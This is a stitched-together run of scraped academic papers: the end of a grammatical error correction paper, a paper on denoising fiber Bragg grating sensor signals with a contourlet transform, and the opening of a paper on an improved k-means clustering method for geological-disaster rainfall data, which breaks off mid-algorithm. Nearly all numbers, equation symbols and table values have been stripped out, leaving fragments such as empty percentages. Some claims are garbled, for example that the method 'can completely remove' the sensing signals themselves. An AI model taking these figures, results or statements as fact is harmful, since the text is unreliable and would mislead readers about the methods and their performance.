university of illinois and columbia system in the conll- shared task. in proceedings of conll shared task. a. rozovskaya, d. roth, and v. srikumar. b. cor- recting grammatical verb errors. in proceedings of eacl. a. stolcke. . srilm-an extensible language model- ing toolkit. in proceedings of international confer- ence on spoken language processing. j. tetreault, j. foster, and m. chodorow. . using parse features for preposition selection and error de- tection. in proceedings of acl. j. wagner. . detecting grammatical errors with treebank-induced, probabilistic parsers. ph.d. the- sis. y. xiang, b. yuan, y. zhang, x. wang, w. zheng, and c. wei. . a hybrid model for grammatical error correction. in proceedings of conll: shared task. j. xing, l. wang, d.f. wong, l.s. chao, and x. zeng. . um-checker: a hybrid system for english grammatical error correction. in proceedings of conll: shared task. h. yannakoudakis, t. briscoe, and b. medlock. . a new dataset and method for automatically grading esol texts. in proceedings of acl. i. yoshimoto, t. kose, k. mitsuzawa, k. sakaguchi, t. mizumoto, y. hayashibe, m. komachi, and y. mat- sumoto. . naist at conll grammat- ical error correction shared task. in proceedings of conll: shared task. appendix a features and additional information about the data classifier art. prep. noun agr. 
form train k k k k k test k k k k k table a. : number of candidate words by classifier type in training and test data (fce). error number of errors and error rate train test art. ( . %) ( . %) prep. ( . %) ( . %) noun ( . %) ( . %) verb agr. ( . %) ( . %) verb form ( . %) ( . %) table a. : statistics on annotated errors in the fce cor- pus. percentage denotes the error rates, i.e. the number of er- roneous instances with respect to the total number of relevant instances in the data. features description ( ) subjhead, subjpos the surface form and the pos tag of the subject head ( ) subjdet determiner of the subject np ( ) subjdistance distance between the verb and the subject head ( ) subjnumber sing – singular pro- nouns and nouns; pl – plural pronouns and nouns ( ) subjperson rdsing – “she”, “he”, “it”, singular nouns; not rdsing – “we”, “you”, “they”, plural nouns; stsing – “i” ( ) conjunctions ( )&( ); ( )&( ) table a. : verb agreement features that use syntactic knowledge. appendix b evaluation metrics here, we discuss the conll- shared task eval- uation metric and provide a little bit more detail on p r e c is io n recall article prep noun agreement form figure : precision/recall curves by error type. the performance of the illinois modules in this con- text. as shown in table in sec. , over % of words (about % in training) are used correctly. the low error rates are the key reason the error cor- rection task is so difficult: it is quite challenging for a system to improve over a writer that already per- forms at the level of over %. indeed, very few nlp tasks already have systems that perform at that level. the error sparsity makes it very challenging to identify mistakes accurately. in fact, the highest precision of . %, as calculated by the shared task evaluation metric, is achieved by the illinois system. however, once the precision drops below %, the system introduces more mistakes than it identifies. we can look at individual modules and see whether for any type of mistake the system improves the quality of the text. fig. shows preci- sion/recall curves for the system in table . it is interesting to note that performance varies widely by error type. the easiest are noun and article usage errors: for nouns, we can do pretty well at the recall point % (with the corresponding precision of over %); for articles, the precision is around % at the recall value of %. for agreement errors, we can get a precision of % with a very high threshold (identifying only % of mistakes). fi- nally, on two mistakes – preposition and verb form – the system never achieves a precision over %. feature type feature group features word n- gram wb, w b, w b, wa, w a, w a, wbwa, w bwb, waw a, w bw bwb, w bwbwa, wbwaw a, waw aw a, w bw bw bwb, w bw bwbwa, w bwbwaw a, wbwaw aw a, waw aw w a pos pb, p b, p b, pa, p a, p a, pbpa, p bpb, pap a, pbwb, pawa, p bw b, p aw a, p bpbpa, pbpap a, pap ap a chunk np headword, npwords, nc, adj&headword, adjtag&headword, adj&nc, adjtag&nc, nptags&headword, nptags&nc np headword&headpos, headnumber wordsafternp headword&wordafternp, npwords&wordafternp, headword& wordsafternp, npwords& wordsafternp, headword& wordsafternp, npwords& wordsafternp wordbeforenp wb&fi ∀i ∈ np verb verb, verb&fi ∀i ∈ np preposition prep&fi ∀i ∈ np table a. : features used in the article error correction system. wb and wa denote the word immediately before and after the target, respectively; and pb and pa denote the pos tag before and after the target. 
headword denotes the head of the np complement. nc stands for noun compound and is active if second to last word in the np is tagged as a noun. verb features are active if the np is the direct object of a verb. preposition features are active if the np is immediately preceded by a preposition. adj feature is active if the first word (or the second word preceded by an adverb) in the np is an adjective. npwords and nptags denote all words (pos tags) in the np. international journal of advanced network, monitoring and controls volume , no. , research on noise removal in fiber grating sensing signal xiaobo zhou * xijing university, xi’an, china e-mail: @qq.com abstract—signal processing is one of the key technology of fiber grating sensor, noise interference on signal transmission, influence of fiber grating sensor practical application effect, in order to solve the noise problem of fiber grating sensing signal, design a denoising method of fiber grating sensing signal based on improved contourlet transform. the acquisition of fiber grating sensing signal firstly, and remove the unwanted signal, select the useful signal, then using contourlet transform, by filtering the noise filter, finally through the concrete experiment to test the effect of denoising. the results show that the improved contourlet transform can completely remove the fiber bragg grating sensing signals, and improve the quality of fbg sensor communication, and verify the effectiveness of the proposed method. keywords-fiber grating; sensing signal; noise interference; contourlet transform; filter i. introduction with the continuous development of optical communication technology, fiber grating sensing technology obtained the unprecedented development of fiber bragg grating sensor with strong ability of resisting electromagnetic interference resistance to corrosion, high sensitivity, small body low cost advantages, has the incomparable advantages of traditional sensors, in the national defense military aerospace and other fields has been widely used in [ - ] in the practical application of fiber bragg grating sensor and sensing signal is very susceptible to noise interference, the measurement precision of the fiber bragg grating sensor is affected, so to remove the noise of the fiber bragg grating sensor research has the vital significance. at home and abroad in recent years, some studies mechanism of fiber bragg grating sensor signal denoising studies [ , ], but the study also not enough in-depth the earliest using fourier transform to deal with the noise of the fiber bragg grating sensor signal, in order to improve the quality of the fiber bragg grating sensor signals, but as a result of the fourier transform of signal decomposition scale is coarser, cannot effectively eliminate the noise of the fiber bragg grating sensor signal [ - ] in order to solve the limitations of fourier transform, some scholars wavelet transform denoising method was adopted to realize fbg sensing signal quality of ascension, the decomposition scale is more detailed, more thoroughly remove noise, but the algorithm of wavelet threshold denoising process, the threshold selection is critical, whether hard or soft threshold threshold was adopted to realize, the current disagreed on threshold selection criteria, and the implementation process is very complicated, not easy to operation. 
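The introduction above criticizes wavelet-threshold denoising for its sensitivity to the threshold choice. For reference, here is a minimal wavelet soft-threshold baseline (not this paper's contourlet method) written with PyWavelets; the wavelet family, decomposition level, and universal-threshold rule are illustrative choices rather than settings taken from the paper.

```python
# Baseline wavelet-threshold denoising referred to in the introduction above
# (not the contourlet method of this paper). Wavelet family, decomposition level,
# and the universal-threshold rule are illustrative choices.
import numpy as np
import pywt

def wavelet_denoise(signal, wavelet="db4", level=4):
    coeffs = pywt.wavedec(signal, wavelet, level=level)
    # Robust noise estimate from the finest detail coefficients.
    sigma = np.median(np.abs(coeffs[-1])) / 0.6745
    threshold = sigma * np.sqrt(2.0 * np.log(len(signal)))
    denoised = [coeffs[0]] + [pywt.threshold(c, threshold, mode="soft") for c in coeffs[1:]]
    return pywt.waverec(denoised, wavelet)[: len(signal)]

# Synthetic FBG-like trace: slowly varying components plus additive noise.
t = np.linspace(0.0, 1.0, 2048)
clean = np.sin(2 * np.pi * 3 * t) + 0.3 * np.sin(2 * np.pi * 11 * t)
noisy = clean + 0.2 * np.random.randn(t.size)
print(np.std(noisy - clean), np.std(wavelet_denoise(noisy) - clean))
```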
The contourlet transform is a multi-scale decomposition method that can effectively suppress noise in a signal. To address the noise present in fiber Bragg grating (FBG) sensing signals, a contourlet-transform-based denoising method for FBG sensing signals is designed; the experiments show that the improved contourlet transform can eliminate the noise in FBG sensing signals and yields high-quality grating sensing signals.

II. Working principle of fiber grating sensing

The fiber Bragg grating sensor is a wavelength-modulated sensor. Because the measurement is encoded in wavelength, it is not affected by fiber loss or by the power of the light source, so its performance is better than that of other types of fiber sensors. Its working principle is shown in figure .

Figure . Working principle of fiber grating sensing

When the quantity acting on the grating changes, the reflected (Bragg) wavelength changes correspondingly, so the measured value of the fiber grating, such as temperature or pressure, can be obtained from the detected wavelength. The relationship between the center-wavelength drift $\Delta\lambda_B$ and the longitudinal strain $\varepsilon$ can be described as

$\Delta\lambda_B = \lambda_B\,(1 - p_e)\,\varepsilon$

where $p_e$ is the effective elasto-optic coefficient of the fiber. The relationship between the center-wavelength drift and a temperature change $\Delta T$ of the FBG can be described as

$\Delta\lambda_B = \lambda_B\,(\alpha + \xi)\,\Delta T$

where $\alpha$ and $\xi$ respectively represent the coefficient of thermal expansion and the thermo-optic coefficient. The relationship between the center-wavelength drift and a pressure change $\Delta P$ of the fiber Bragg grating is

$\dfrac{\Delta\lambda_B}{\lambda_B} = \left(\dfrac{1}{\Lambda}\dfrac{\partial\Lambda}{\partial P} + \dfrac{1}{n}\dfrac{\partial n}{\partial P}\right)\Delta P$

where $\Lambda$ is the grating period and $n$ the effective refractive index. Let $E$ be the elastic modulus of the fiber Bragg grating and $\nu$ its Poisson ratio; the relative length change and the refractive-index change of the FBG under pressure $P$ are then

$\dfrac{\Delta L}{L} = -\dfrac{(1 - 2\nu)\,P}{E}, \qquad \dfrac{\Delta n}{n} = \dfrac{n^{2} P}{2E}\,(1 - 2\nu)\,(2p_{12} + p_{11})$

where $p_{11}$ and $p_{12}$ are elasto-optic tensor components. In the process of fiber Bragg grating sensing, the refractive index is affected by many factors, and noise interference is the largest among them; it adversely affects measurements such as temperature and pressure. For this reason, the contourlet transform is introduced in this paper to denoise the FBG sensing signal and thereby improve the accuracy of temperature, pressure, and similar measurements.
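As a quick numerical illustration of the strain and temperature relations in Section II above, the sketch below evaluates the wavelength shift directly. The coefficient values (p_e, alpha, xi) are generic ballpark figures for a silica fiber, used only as placeholders; they are not values taken from this paper.

```python
# Center-wavelength shift of an FBG from the strain and temperature relations above.
# The coefficient values are generic placeholder figures for a silica fiber, not
# values taken from this paper.

def bragg_shift(lambda_b_nm, strain=0.0, delta_t=0.0,
                p_e=0.22, alpha=0.55e-6, xi=6.7e-6):
    """Wavelength shift (nm): lambda_B * [(1 - p_e) * strain + (alpha + xi) * dT]."""
    return lambda_b_nm * ((1.0 - p_e) * strain + (alpha + xi) * delta_t)

# A 1550 nm grating under 100 microstrain and a 10 degC temperature rise:
print(bragg_shift(1550.0, strain=100e-6, delta_t=10.0))   # ~0.233 nm
```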
III. The method of grating sensing-signal denoising by contourlet transform

A. Contourlet transform

To overcome the limitations of the wavelet transform, researchers proposed the contourlet transform. It analyzes a signal in both scale and direction, so that the energy of the useful signal in a noisy measurement is concentrated in a small number of coefficients; the original signal is approximated by the contourlet basis, and the transform has anisotropic (direction-selective) characteristics. The noisy signal is decomposed into multiple scales by a Laplacian pyramid, the components belonging to the signal and to the noise are identified, and the noise is removed by directional filtering, after which the denoised signal is reconstructed. First, the FBG sensing signal is filtered and sampled to obtain its low-frequency content; the signal is then processed again to obtain its high-frequency content. In figure , x represents the FBG sensing signal, and H and G denote the low-pass analysis filter and the synthesis filter, respectively.

Figure . Decomposition (a) and reconstruction (b) of fiber Bragg grating signals

The three-level directional subband division performed by the directional filter is shown in figure ; the subbands of the upper level are resampled by the resampling operator and the results are output.

Figure . Subband division of the directional filter

B. The denoising principle of the FBG sensing signal in the contourlet transform

Because the useful FBG sensing signal and the noise show different characteristics in the contourlet domain, the FBG sensing signal is transformed at different levels and the noise is removed according to an appropriate threshold. Let the original FBG sensing signal be $g(x),\ x = 1,\dots,N$, and the noisy FBG sensing signal be $f(x) = g(x) + n(x),\ x = 1,\dots,N$, where the noise has zero mean and variance $\sigma^{2}$. The standard deviation of each decomposition layer is estimated as

$\hat{\sigma}(j) = \dfrac{\mathrm{median}\big(|w_f(j)|\big)}{0.6745}$

where $w_f(j)$ denotes the decomposition coefficients of $f(x)$ at the $j$-th layer.

C. Selection of the threshold for FBG sensing-signal denoising

There are many threshold-selection methods for the contourlet transform. Because the universal threshold method is general and easy to implement, it is adopted here to determine the denoising threshold for the FBG sensing signal; the high-frequency subband threshold of the universal threshold method is

$th(j) = \hat{\sigma}(j)\,\sqrt{2\lg\big(M(j)\,N(j)\big)}$

where $M(j)\,N(j)$ is the number of contourlet decomposition coefficients of layer $j$. The larger $M(j)\,N(j)$ is, the more high-frequency coefficients of the FBG decomposition this threshold sets to zero, and a large amount of useful FBG signal would be removed along with the noise. The threshold is therefore corrected as

$th_1(j) = \dfrac{th(j)}{\sqrt{M(j)\,N(j)}}$

D. The process of FBG sensing-signal denoising

Step 1: The contourlet transform is applied to the noisy FBG sensing signal $f(x)$; the coefficients in the contourlet domain are

$w = CT\big(f(x)\big) = CT_g + CT_n$

where $CT_g$ and $CT_n$ denote the contributions of the clean signal and of the noise, respectively.

Step 2: The estimated contourlet coefficients $\hat{w}$ of the original signal $g(x)$ are obtained by applying the denoising rule to the coefficients $w$ of the noisy FBG sensing signal:

$\hat{w} = \begin{cases} w, & |w| \ge th(j) \\ 0, & |w| < th(j) \end{cases}$

Step 3: The inverse contourlet transform is applied to the estimated coefficients $\hat{w}$ to obtain the denoised FBG sensing signal $g'(x)$:

$g'(x) = CT^{-1}(\hat{w})$
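Standard Python signal-processing libraries do not include a contourlet transform, so the sketch below leaves the transform itself abstract and only illustrates the per-subband noise estimate, universal threshold, and hard-threshold rule defined above on generic coefficient arrays, together with MSE and PSNR helpers of the kind used for evaluation in the next section (the peak value in the PSNR is taken as the maximum absolute sample, which is one of several common conventions).

```python
# Sketch of the subband thresholding rule defined above, applied to generic
# coefficient arrays; the contourlet transform itself is left abstract. MSE and
# PSNR helpers are included for the evaluation in the next section.
import numpy as np

def subband_sigma(w):
    """Robust noise estimate for one subband: median(|w|) / 0.6745."""
    return np.median(np.abs(w)) / 0.6745

def subband_threshold(w):
    """Universal threshold: sigma(j) * sqrt(2 * log(number of coefficients))."""
    return subband_sigma(w) * np.sqrt(2.0 * np.log(w.size))

def hard_threshold(w, th):
    """Keep coefficients with |w| >= th, zero the rest (the rule for w-hat above)."""
    return np.where(np.abs(w) >= th, w, 0.0)

def mse(x, y):
    return float(np.mean((np.asarray(x) - np.asarray(y)) ** 2))

def psnr(x, y):
    peak = float(np.max(np.abs(x)))
    return 10.0 * np.log10(peak ** 2 / mse(x, y))

# Example on one synthetic subband: mostly noise with a few large signal coefficients.
rng = np.random.default_rng(0)
subband = rng.normal(0.0, 0.1, 4096)
subband[::256] += 2.0
th = subband_threshold(subband)
print(th, np.count_nonzero(hard_threshold(subband, th)))
```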
IV. Test and analysis of the denoising effect for the FBG sensor

A. The noisy fiber grating sensing signal

To analyze the denoising effect of the contourlet transform on the FBG sensing signal, MATLAB was used as the test platform for the denoising experiment. The noisy fiber grating sensing signal is shown in figure .

Figure . The noisy fiber grating sensing signal

B. Results and analysis

1) The denoising effect of this paper. The contourlet transform is used to denoise the noisy FBG sensing signal of figure ; the FBG sensing signal after denoising is shown in figure . As can be seen from figure , the contourlet transform removes the noise in the FBG sensing signal very well and improves the quality of the FBG sensing signal; it is an effective method for removing noise from FBG sensing signals.

Figure . The denoising result of the FBG sensing signal with the contourlet transform

2) Performance comparison with current classical methods. To test the advantage of the contourlet transform in denoising, the wavelet transform [ ] and the method of literature [ ] were used for comparison experiments, and the peak signal-to-noise ratio (PSNR) and the mean square error (MSE) [ ] were used to evaluate the denoising results for the FBG sensing signal. The PSNR and MSE after denoising are shown in table I. As can be seen from table I, the PSNR of the FBG sensing signal after contourlet-transform denoising is the highest, which indicates better signal quality and more thorough noise removal, whereas the comparison methods cannot completely and effectively eliminate the noise in the FBG sensing signal, and the residual noise interferes with the measurement accuracy of the FBG sensor. At the same time, the MSE of the contourlet transform is far smaller than that of the comparison methods, which indicates that its denoising results are more stable; its denoising time is also shorter, so it can satisfy the practical requirements of denoising large volumes of FBG sensing signals.

Table I. Performance comparison of classical grating sensing-signal denoising methods

  denoising method        psnr    mse
  wavelet transform        .       .
  literature [ ]           .       .
  contourlet transform     .       .

V. Summary

Noise seriously degrades the quality of the FBG signal and limits its range of application and practical value. To eliminate this adverse effect, a contourlet-transform-based denoising method for fiber grating sensing signals was proposed. Exploiting the multi-scale and directional advantages of the contourlet transform, the FBG sensing signal is decomposed, the noisy components in the decomposition are identified, the noise is removed by the corresponding filters, and the denoised signal is reconstructed by the inverse contourlet transform, which improves the signal-to-noise ratio of the FBG sensing signal. The method was also compared experimentally with other denoising methods: the comparison methods can, at times
, remove some useful signals while removing noise, while the method in this paper may keep the useful signal as much as possible, and at the same time improve the real-time performance of the fiber bragg grating sensing signal. acknowledgement xijing university scientific research foundation project(xj ). references [ ] l li ,a j xia : the advantages and applications of fiber bragg grating sensing technology [j]. optical communication technology, ( ): - . [ ] k.w. zhang, s.w. zhang and s. x.zhao: application of fiber bragg grating strain sensor in bridge structure monitoring [j]. optical instrument, , ( ): - . [ ] a.q. li, g.d.zhou: research progress and prospect of optical fiber bragg sensor testing technology [j]. journal of southeast university (natural science edition), , ( ): - . [ ] jeanno f, joel c, john b: low energy impact damage monitoring of composites using dynamic strain signals from fbg sensors-part ii: damage identification [j]. composite structures, , : - . [ ] z. q.lin, h. yang and h.s. chen: temperature compensation of fiber grating strain sensor [j]. journal of southeast university (natural science edition), , ( ): - . [ ] c.xning, s.s. zhang :experimental study on temperature compensation of fiber grating [j]. journal of hebei university of science and technology, , ( ): - . [ ] p.x.zheng, y.l. song and d.s. zhang: experimental study on temperature and strain sensing characteristics of fiber bragg grating [j]. instrument technology and sensor, , ( ): - . [ ] x.f. zhou,l.liang: experimental study on stability of fiber bragg grating sensor [j]. sensor and microsystem, , ( ): - . [ ] loutas t h, kostopoulos v, ramirez-jimenez c, et al: damage evolution in center-holed glass/polyester composites under quasi-static loading using time/frequency analysis of acoustic emission monitored waveforms [j]. composite science and technology, , : - . [ ] l.q.hou,x.f.zhao;z.p.leng andt.sun :improved calculation value of temperature compensation of fiber bragg grating strain sensor [j]. journal of sensor technology, , ( ): - . [ ] j.p.li, x.l.zeng and j.w. guan: study on refractive index sensing of fiber bragg grating [j]. laser and infrared, , ( ): - . [ ] hampshire t a, adelih.:monitoring the behavior of steel structures using distributed optical fiber sensors. journal of constructional steel research, , ( ): - . [ ] hill k o, fujii y, johnson d c, et al. photosensitivity in optical fiber waveguides: application to reflection filter fabrication[j]. applied physics letters, , ( ): - . [ ] j. zhou, t.g.ning: study on demodulation of fiber bragg grating sensing signals [j]. optical communication technology, , : - . [ ] x.lyu, z.b.zhang and y. qu: study on curved long-period photonic crystal fiber grating sensing [j]. laser technology, , ( ): - . [ ] j. j.cao, l.l.hu and r. zhao: an optical fiber grating sensing signal de-noising method that improves the wavelet threshold function [j]. journal of sensing technology, , ( ): - . [ ] y. p.wang, l.l.hu and b.wang: optical fiber grating sensing signal de-noising based on digital filtering and its fpga implementation [j]. journal of xi 'an university of technology, , ( ): - . [ ] l. liu,m. yu and r.j. yang:wavelet de-noising for optical fiber raman temperature sensing system [j]. china laser, , ( ): - . international journal of advanced network monitoring and controls volume , no. 
improved k-means algorithm based on optimizing initial cluster centers and its application

xue linyao, wang jianguo
school of computer science and engineering, xi'an technological university, xi'an, china
email: xuelinyaoyao@foxmail.com

abstract. data mining is the process of grouping or partitioning large and complex data, and clustering analysis is an important research field in data mining. the k-means algorithm is considered to be the most important unsupervised machine learning method in clustering; it divides all the data into k subclasses that are very different from each other, and by constantly iterating it minimizes the distance between each data object and the center of its subclass. because the k-means algorithm is simple and efficient, it is applied in data mining, knowledge discovery and other fields. however, the algorithm has inherent shortcomings: for example, the value of k needs to be given in advance, and the clustering results are highly dependent on the selection of the initial clustering centers. in order to adapt the algorithm to the clustering of historical data from a geological disaster monitoring system, this paper presents a method for optimizing the initial clustering centers together with a method for handling isolated points. the experimental results show that the improved k-means algorithm is better than traditional clustering in terms of accuracy and stability, and its results are closer to the actual data distribution.

keywords: clustering analysis, improved k-means algorithm, geological disaster monitoring data

introduction

geological disasters cause great casualties; the main causes include landslides, debris flows, rainfall and so on. these geological disasters damage many local public facilities, large and small, and bring great losses to people and their property, and there are still many such cases in china. faced with such a severe threat, the state and local governments have invested a great deal of human and material resources in the prevention and control of geological disasters and have achieved remarkable results. with the progress of technology and the rapid development of information technology, many new kinds of monitoring equipment have been put into real-time geological disaster monitoring, such as gps, secondary sound wave monitoring, radar and so on. with the development of geological hazard monitoring technology, the amount of monitoring data has grown by leaps and bounds, and the data types are becoming more and more complex as well.

the k-means algorithm is a classical partition-based clustering algorithm that is widely used in industrial and commercial applications. as is well known, it has both many advantages and many disadvantages. research on the deficiencies of the k-means algorithm is divided into two branches: 1) the number of initial clustering centers k; 2) the choice of the initial clustering centers. in this paper, we mainly study the latter and propose a new initial clustering center algorithm. the data source of the study is the historical data detected by the geological disaster monitoring system; records are randomly selected from the rainfall data of different areas in shaanxi province as the research object, and they serve as a representative sample for the improved k-means clustering algorithm.
the experimental results show that the algorithm is better than traditional clustering in terms of accuracy and stability, and the experimental results are closer to the actual data distribution.

brief overview and research status of the k-means algorithm

overview of the k-means algorithm

the k-means algorithm is a classical unsupervised clustering algorithm. its purpose is to divide a given data set containing n objects into k clusters so that the objects within a cluster are as similar as possible, while the objects in different clusters are as dissimilar as possible. let the sample set be x = {x_1, x_2, x_3, ..., x_n}, where n is the number of samples. the idea of the k-means algorithm is as follows: firstly, k data objects are randomly selected from the sample set x as the initial clustering centers; secondly, according to the degree of similarity between each data object and the k clustering centers, each object is allocated to the most similar cluster; then the average of each new cluster is recalculated and used as the clustering center for the next iteration, and the process is repeated until the updated cluster centers no longer change, that is, until the criterion function e converges.

the goal is to make the similarity of the objects within a cluster as large as possible and the similarity between objects in different clusters as small as possible. the degree of similarity between data objects can be determined by calculating the euclidean distance between them. for an n-dimensional real vector space, the euclidean distance between two points is defined as

d(x, y) = \sqrt{\sum_{i=1}^{n} (x_i - y_i)^2},   (1)

where x_i and y_i are the attribute values of x and y respectively. the criterion function is defined as

e = \sum_{i=1}^{k} \sum_{x \in c_i} \| x - \bar{c}_i \|^2,   (2)

where k is the total number of clusters and \bar{c}_i is the center of cluster c_i. the flow of the k-means algorithm is shown in figure 1.

figure 1. flow of the k-means algorithm
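as a point of reference for the improvements discussed in the remainder of this section, the short python sketch below implements the baseline procedure and the criterion function e of eqs. (1) and (2); it is a minimal illustration under the assumption of euclidean distance, and the random selection of the initial centers in it is exactly the step that the rest of the paper replaces.

```python
import numpy as np

def kmeans(x, k, max_iter=100, seed=None):
    """baseline k-means: random initial centers, assign, update, repeat."""
    rng = np.random.default_rng(seed)
    x = np.asarray(x, dtype=float)
    # step 1: randomly select k data objects as the initial clustering centers
    centers = x[rng.choice(len(x), size=k, replace=False)]
    labels = np.zeros(len(x), dtype=int)
    for _ in range(max_iter):
        # step 2: assign every object to its most similar (nearest, eq. 1) center
        dists = np.linalg.norm(x[:, None, :] - centers[None, :, :], axis=2)
        labels = dists.argmin(axis=1)
        # step 3: recompute each center as the mean of its cluster
        new_centers = np.array([x[labels == j].mean(axis=0) if np.any(labels == j)
                                else centers[j] for j in range(k)])
        # step 4: stop once the centers no longer change (criterion function converges)
        if np.allclose(new_centers, centers):
            break
        centers = new_centers
    # criterion function e (eq. 2): total squared distance of objects to their centers
    e = float(((x - centers[labels]) ** 2).sum())
    return labels, centers, e
```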
research status of the k-means algorithm

because of its advantages, the k-means algorithm has been widely used in practice, but it has many shortcomings as well. in order to obtain a better clustering effect, many researchers have explored ways of improving k-means, and many scholars have proposed improved methods aimed at its shortcomings in selecting the initial points. duan guiqin [ ] optimizes the initial clustering centers with a criterion based on the product of the mean distance and the maximum distance: the algorithm first adds the data objects of the sample set that are farthest from each other to the set of clustering centers, and then repeatedly adds the data object whose product of mean distance and distance to the current clustering centers is the largest, which improves the accuracy. yi baolin et al. [ ] proposed another improved k-means algorithm, which first calculates the density of the region to which each data object belongs and then selects k points in the high-density regions as the initial centers; the experimental results show that the algorithm reduces the impact of the initial center points. yiu-ming cheng [ ] and others proposed a new clustering technique called the k*-means algorithm. the algorithm consists of two separate steps: a center point is provided for each cluster in the first step, and the units are then adjusted through adaptive learning rules in the second step. the algorithm overcomes the initial-center sensitivity of k-means and the blindness in choosing k, but the calculation is complicated. xie and others [ ] proposed a k-means algorithm that optimizes the initial clustering centers by using the minimum variance based on the compactness information of the sample space distribution; the algorithm chooses as the initial clustering centers the samples that have the smallest variance and are located a certain distance away from each other. liu jiaxing et al. [ ] proposed a radius-based k-means + λ algorithm: when selecting the initial cluster center points, the distance ratios between points are calculated from the λ parameter within a circle of a specific radius, and an initial center point is selected according to the distance ratio; the algorithm achieves better performance in error rate and running time. ren jiangtao [ ] proposed an improved k-means algorithm for text clustering, which introduces feature selection and dimension reduction, sparse vector selection, and an initial center point search based on density and spreading; class accuracy, stability and other aspects are improved.

the analysis of the shortcomings of the k-means algorithm

1) the value of k in the k-means algorithm needs to be given in advance. according to the k value determined in advance, the clustering samples are divided into k classes so that the sum of squared distances of all the samples in each cluster to its clustering center is minimized.

2) the clustering results are highly dependent on the selection of the initial clustering centers. the k-means algorithm uses a stochastic method to select the initial clustering centers; if the initial clustering centers are chosen improperly, it is difficult to obtain an ideal clustering effect. this dependence on the initial values may lead to instability of the clustering results, and it is easy to fall into a local optimum rather than the global optimum.

3) the algorithm is sensitive to noise and isolated points.

improvement of the k-means algorithm and its application

the selection of data objects in cluster analysis

when selecting data, the preliminary data are collected first; then the characteristics of the data are examined to assess the quality of the data and to obtain a basic observation of the data or of the implied information, so as to identify the subset of data of interest. the segmentation variables of the data objects determine the formation of the clusters, which in turn affects the correct interpretation of the clustering results, and ultimately affects the stability of the clusters after new data objects are added. before the k-means clustering data mining, the sample data set related to the clustering analysis should be extracted from the original data object set; it is not necessary to use all the historical data. in addition, attention should be paid to the quality of the data: only high-quality data can lead to correct analysis conclusions and provide a scientific basis for clustering. the source of the research object is the historical monitoring data of the geological disaster monitoring system. from the records of geological monitoring data, a representative sample for this improved k-means clustering algorithm is selected as the object of study, and two samples of daily rainfall data are randomly selected from different regions.
the sample data attributes are shown in table 1.

table 1. the sample data attributes

field number   field name    field code   type of data
1              id            xx           number
2              sno           yy           varchar
3              type          type         varchar
4              gettime       time         datetime
5              alarm level   alarm        integer
6              value         value        double
7              day value     d_value      double

for the cluster analysis, there are obviously redundant attributes among the data attributes of the above geological hazard monitoring system, and they do not contribute to an objective cluster analysis; therefore, the redundant attributes should be eliminated. finally, only four data object attributes reflecting the characteristics of the rainfall data are selected as the research object. the optimized data attributes are shown in table 2.

table 2. the optimized data attributes

field number   field name   field code   type of data
1              id           xx           number
2              sno          yy           varchar
3              gettime      time         datetime
4              day value    d_value      double

improvement of the k-means algorithm

considering the characteristics of the rainfall data of the above geological disaster monitoring system, the k-means algorithm is very sensitive to the initial centers: an improperly chosen initial clustering center easily drives the clustering result into a local optimum, and the influence of isolated points is large. based on the observation that the cluster with the largest variance can be split into two clusters with smaller variance, an algorithm for initializing the centers is proposed; in addition, a method for handling isolated points is proposed. the idea of this algorithm is to first find the two points of the sample set that are farthest from each other and take them as initial center points, then divide the other sample points into the cluster of the nearest center point, determine from the number of points within each cluster whether the corresponding initial clustering center is an isolated point, and finally select the next cluster to be split according to the variance within the clusters and update the initial cluster centers according to certain rules. the above steps are repeated until the required number of cluster centers is reached.

1) initial clustering center selection algorithm

let x = {x_1, x_2, x_3, ..., x_n}, where n is the number of samples; d(x_i, x_j) (i, j ∈ {1, ..., n}) is the euclidean distance between the data points x_i and x_j; c_i denotes a clustering center; q is the set of data objects that will be split; s is the number of clustering centers. the initial clustering center selection algorithm is as follows:

input: data set x, number of clusters k, threshold u
output: cluster center set c and isolated point set d

(1) let q = x = {x_1, x_2, x_3, ..., x_n} and s = 0;
(2) calculate the euclidean distance d(x_i, x_j) between every two data points in q, find the two points x_i, x_j that are farthest from each other, mark them as c_i and c_j, add them to c, and let s = s + 2; let q_i = {x_p | d(x_p, x_i) < d(x_p, x_j), x_p ∈ q} and q_j = {x_p | d(x_p, x_j) < d(x_p, x_i), x_p ∈ q}, which means that q is divided by the two new centers and q_i and q_j become the split clusters;
(3) if the number of data objects in q_i or q_j is less than u, the selected initial center x_i or x_j is an isolated point: remove x_i or x_j from q, remove c_i or c_j from the set c, add x_i or x_j to d, and return to step (2);
(4) if the number of centers in the set c is less than k, find the split cluster q_p with the largest variance, let q = q_p and s = s - 1, remove c_p from the set c, and return to step (2);
(5) calculate the mean of all the objects in each split cluster; the resulting means are the k initial clustering centers.
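the initialization procedure above can be sketched as follows in python. this is one possible reading of the steps rather than the authors' code: the variance of a cluster is taken as the sum of its per-attribute variances, ties are broken arbitrarily, and a simple guard stops the loop if too few points remain after removing isolated points.

```python
import numpy as np

def improved_initial_centers(x, k, u):
    """variance-based splitting initialization with isolated-point detection."""
    x = np.asarray(x, dtype=float)
    active = np.arange(len(x))      # q: indices of the objects currently being split
    clusters = []                   # finished split clusters (index arrays)
    isolated = []                   # detected isolated points (set d)

    while len(active) >= 2:
        pts = x[active]
        # step 2: find the two points of q that are farthest from each other
        d = np.linalg.norm(pts[:, None, :] - pts[None, :, :], axis=2)
        a, b = np.unravel_index(np.argmax(d), d.shape)
        xi, xj = active[a], active[b]
        # split q around the two candidate centers
        side_i = np.linalg.norm(pts - x[xi], axis=1) <= np.linalg.norm(pts - x[xj], axis=1)
        qi, qj = active[side_i], active[~side_i]
        # step 3: a candidate whose cluster holds fewer than u objects is an isolated point
        if len(qi) < u or len(qj) < u:
            bad = xi if len(qi) < u else xj
            isolated.append(int(bad))
            active = active[active != bad]
            continue
        clusters.extend([qi, qj])
        # step 5: enough clusters, so their means become the initial centers
        if len(clusters) >= k:
            break
        # step 4: otherwise re-split the cluster with the largest variance
        variances = [x[c].var(axis=0).sum() for c in clusters]
        active = clusters.pop(int(np.argmax(variances)))

    centers = np.array([x[c].mean(axis=0) for c in clusters[:k]])
    return centers, np.array(isolated, dtype=int)
```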
2) improved k-means algorithm

let the data set be x = {x_1, x_2, x_3, ..., x_n} with n objects; c_old,i represents the i-th cluster center of the previous round, and c_new,i represents the new cluster center calculated in the current round. the algorithm is described as follows:

input: data set x, number of clusters k, threshold u
output: k clusters

(1) call the improved initialization center selection algorithm to obtain the initial centers; if there are isolated points, they are placed alone in a separate class and do not participate in the subsequent clustering;
(2) calculate the distance between every data object and the k cluster centers, and assign each data object to the nearest cluster;
(3) calculate the mean of each cluster to obtain the new round of cluster centers;
